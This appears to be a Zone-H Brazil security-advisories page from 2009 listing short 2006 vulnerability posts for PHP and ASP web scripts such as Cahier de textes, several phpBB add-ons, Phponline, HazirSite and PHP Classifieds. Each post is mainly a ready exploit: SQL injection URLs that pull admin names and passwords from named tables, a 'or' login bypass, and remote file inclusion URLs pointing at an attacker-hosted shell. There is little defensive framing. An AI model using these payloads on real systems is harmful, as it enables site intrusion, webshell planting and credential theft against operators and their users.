Zone-H
Home arrow Avisos de Segurança
05 de julho de 2009
  
 
Ataques desta semana
O.S.  Defs.  %
Win 2003  4243  46.12%
Linux  3965  43.10%
Win 2000  486  5.28%
FreeBSD  208  2.26%
Win 2008  112  1.22%
Other  185  2.01%

Total de ataques: 9199 dos quais 3045 único(s) no ip e 6154 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
Cahier de textes: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
07 de outubro de 2006

Nome do Script: Cahier de textes
Site do script: -
Versão Afetada: 2.0

Encontrado por s4mi
Email: s4mi[at]linuxmail[dot]org

Exploração:

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=[SQL]

Ou

http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]


Exemplo:

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*
 
phpBB User Viewed Posts Tracker Version: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 1
07 de outubro de 2006
Nome do Script: phpBB User Viewed Posts Tracker Version
Site do script: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip
Versão Afetada: 1.0

Encontrado pelo Turko XORON

Email: x0r0n_at_hotmail.com

Exploração:

http://www.site.com/[path]/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?
 
Dimension of phpBB: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
06 de outubro de 2006
Nome do Script: Dimension of phpBB
Site do script: http://www.phpbb-dimension.de
Versão Afetada: 0.2.5

Encontrado por SpiderZ
Site: www.spiderz.altervista.org

Exploração:

http://site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]
 
Phponline : Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 1
06 de outubro de 2006
Nome do Script: Phponline
Site do script: http://www.dayanahost.com/file/phponline_2.1.1.zip
Versão Afetada: Não Especificada
Encontrado por MoHaNdKo
Email: xp1o_at_msn.com

Exploração:

http://sitename.com/[scerpitPath]/strload.php?LangFile=http://SHELLURL.COM
 
HazirSite: Injeção de SQL Imprimir E-mail
Avaliação do Usuário: / 1
06 de outubro de 2006
Nome do Script: HazirSite
Site do script: http://www.aspindir.com/indir.asp?id=2728
Versão Afetada: 2.0

Encontrado por Dj ReMix
Email: dj_remix_20_at_hotmail.com

Exploração:

Usuario: 'or'
Senha: 'or'

Pagina de Administração:

http://victim.com/[path to script]/idare.asp
 
PHP Classifieds: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 1
05 de outubro de 2006

Nome do Script: PHP Classifieds
Site do script: www.deltascripts.com/phpclassifieds
Versão Afetada: 7.1

Encontrado por Kzar
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

search.php?catid_search=[sql]
index.php?catid=[sql]

Exemplo:

index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
 

 
Mais...
<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 183 - 208 de 236
[Voltar]
 
Top!
(C) 2009 Zone-H - Unrestricted Information
Top!